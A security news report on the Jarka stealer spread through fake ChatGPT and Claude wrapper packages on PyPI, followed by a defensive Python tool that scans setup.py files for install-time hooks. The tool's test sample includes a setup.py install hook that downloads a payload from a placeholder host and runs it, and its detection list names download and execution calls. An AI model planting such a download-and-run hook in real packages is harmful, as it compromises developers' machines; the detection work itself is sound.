Man
Professional
Experts from Kaspersky GReAT (Kaspersky Lab's Global Research and Analysis Team) discovered an attack on the software supply chain that lasted for almost a year. Through the Python Package Index (PyPI) software repository, attackers distributed malicious packages under the guise of tools for creating chatbots based on neural networks. In this way, users' devices were infected with the Jarka stealer.
Kaspersky GReAT experts found that the malware developer was selling and distributing it via a Telegram channel and a bot using the Malware-as-a-Service (MaaS) model. They also found that the Jarka source code was uploaded to GitHub, making it available for download to anyone.
Based on the language artifacts found in the malware code and ads in Telegram, we can say with a medium to high degree of certainty that the malware was created by a Russian-speaking attacker.
“The discovered campaign highlights the ongoing risks associated with supply chain attacks. It is critical to exercise caution when integrating open source components during the development process. We recommend that organizations implement strict code integrity checks at all stages of development to ensure the legitimacy and security of external software or external components. This is especially important when integrating new popular technologies, such as neural networks,” comments Leonid Bezvershenko, cybersecurity expert at Kaspersky GReAT.
Kaspersky Lab reported the malicious packages to PyPI, and they have since been removed. The company continues to monitor activity related to Jarka and other suspicious uploads to open source platforms, including PyPI, to ensure the security of the software supply chain.
Source
Who was affected by the attack?
The malicious packages had been available on PyPI, a repository used by Python developers, since November 2023. Before they were discovered, they had been downloaded 1,700 times by users in 30 countries. According to PyPI statistics obtained from third-party monitoring services, the greatest interest in these tools was in the United States, China, France, Germany, and Russia. The attackers did not appear to be targeting any specific organization or region.
How the threat was identified
Kaspersky GReAT experts discovered the malicious packages using an internal automated system for monitoring open-source repositories. These packages were disguised as Python wrappers for two popular neural network-based chatbots: ChatGPT by OpenAI and Claude AI by Anthropic. They did provide access to the chatbot functionality, but at the same time installed the Jarka stealer on users' devices.
What can the malware do?
The Jarka stealer, written in Java, can steal data from various browsers, take screenshots, collect system information, and intercept session tokens from applications such as Telegram, Discord, Steam, and the Minecraft cheat client. The malware also contains functionality for terminating browser processes such as Chrome and Edge, which releases the browsers' profile files so that saved data can be read and stolen. The collected information was packed into an archive, sent to the attackers' server, and then deleted from the infected device.
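The wrappers described above delivered a working chatbot client and still dropped a stealer, so reviewing a package's public API is not enough; the install step itself has to be checked. The page does not say how the Jarka packages ran their payload, so the following is an added example (not Kaspersky's tooling and not code from the packages) that statically triages a setup.py for the generic patterns that give a package code execution at `pip install` time: subclassing a setuptools command, overriding `cmdclass`, and spawning processes or fetching remote content from the build script. The two setup.py strings, the `chatbot-wrapper` name and the `example.invalid` URL are constructed for the demo.

```python
"""Static triage of a setup.py for install-time code execution.

Constructed example: flags setuptools command hooks and calls that a build
script has no reason to make (process spawning, downloads, blob decoding,
dynamic execution). It is a heuristic first pass, not a malware verdict.
"""
from __future__ import annotations

import ast

# Fully qualified call names that should not appear in a setup.py.
SUSPICIOUS_CALLS = {
    "subprocess.Popen", "subprocess.run", "subprocess.call", "subprocess.check_output",
    "os.system", "os.popen", "os.startfile",
    "urllib.request.urlopen", "urllib.request.urlretrieve", "requests.get",
    "base64.b64decode", "exec", "eval",
}
# setuptools/distutils command classes; a subclass runs during `pip install`.
INSTALL_HOOK_BASES = {"install", "develop", "build_py", "egg_info", "bdist_egg"}
SETUP_FUNCS = {"setup", "setuptools.setup", "distutils.core.setup"}


def _dotted(node: ast.AST) -> str | None:
    """Turn an Attribute chain ending in a Name (`a.b.c`) into 'a.b.c'."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def _import_map(tree: ast.AST) -> dict[str, str]:
    """Map local bindings to qualified names, so `from subprocess import Popen`
    and `import subprocess as sp` both resolve to subprocess.*"""
    names: dict[str, str] = {}
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.asname:
                    names[alias.asname] = alias.name
        elif isinstance(node, ast.ImportFrom) and node.module:
            for alias in node.names:
                names[alias.asname or alias.name] = f"{node.module}.{alias.name}"
    return names


def _resolve(dotted: str, names: dict[str, str]) -> str:
    head, _, rest = dotted.partition(".")
    head = names.get(head, head)
    return f"{head}.{rest}" if rest else head


def triage_setup_py(source: str) -> list[str]:
    """Return one finding per suspicious construct; an empty list means nothing flagged."""
    tree = ast.parse(source)
    names = _import_map(tree)
    findings: list[str] = []
    for node in ast.walk(tree):
        if isinstance(node, ast.ClassDef):
            for base in node.bases:
                dotted = _dotted(base)
                if dotted is None:
                    continue
                full = _resolve(dotted, names)
                if full.split(".")[-1] in INSTALL_HOOK_BASES:
                    findings.append(f"line {node.lineno}: class {node.name} hooks setuptools command {full}")
        elif isinstance(node, ast.Call):
            dotted = _dotted(node.func)
            if dotted is None:
                continue
            full = _resolve(dotted, names)
            if full in SUSPICIOUS_CALLS:
                findings.append(f"line {node.lineno}: call to {full}")
            if full in SETUP_FUNCS and any(kw.arg == "cmdclass" for kw in node.keywords):
                findings.append(f"line {node.lineno}: setup() overrides cmdclass")
    return findings


# Constructed samples (not real packages): a plain build script and one that
# downloads and launches a payload from a custom install command.
BENIGN_SETUP_PY = '''\
from setuptools import setup, find_packages

setup(
    name="chatbot-wrapper",
    version="1.0.0",
    packages=find_packages(),
    install_requires=["requests"],
)
'''

SUSPECT_SETUP_PY = '''\
import base64
import subprocess
import urllib.request
from setuptools import setup
from setuptools.command.install import install


class PostInstall(install):
    def run(self):
        install.run(self)
        urllib.request.urlretrieve("http://example.invalid/payload", "payload.bin")
        subprocess.Popen(["java", "-jar", "payload.bin"])


setup(
    name="chatbot-wrapper",
    version="1.0.0",
    packages=["chatbot_wrapper"],
    cmdclass={"install": PostInstall},
)
'''

if __name__ == "__main__":
    for label, src in (("benign", BENIGN_SETUP_PY), ("suspect", SUSPECT_SETUP_PY)):
        found = triage_setup_py(src)
        print(f"{label}: {len(found)} finding(s)")
        for item in found:
            print("  ", item)
```

Run it over the sdist's setup.py before installing, for instance on the tree obtained with `pip download --no-binary :all: --no-deps <package>`. Wheels do not execute setup.py, so for wheel-only releases the same review belongs on the package's `__init__.py` and whatever it imports on first use. Legitimate builds that shell out to a compiler will also trigger the process-spawning rule, so treat a hit as a prompt for manual review rather than a verdict, and pair the check with hash-pinned requirements (`pip install --require-hashes`) so a reviewed artifact cannot be silently swapped later.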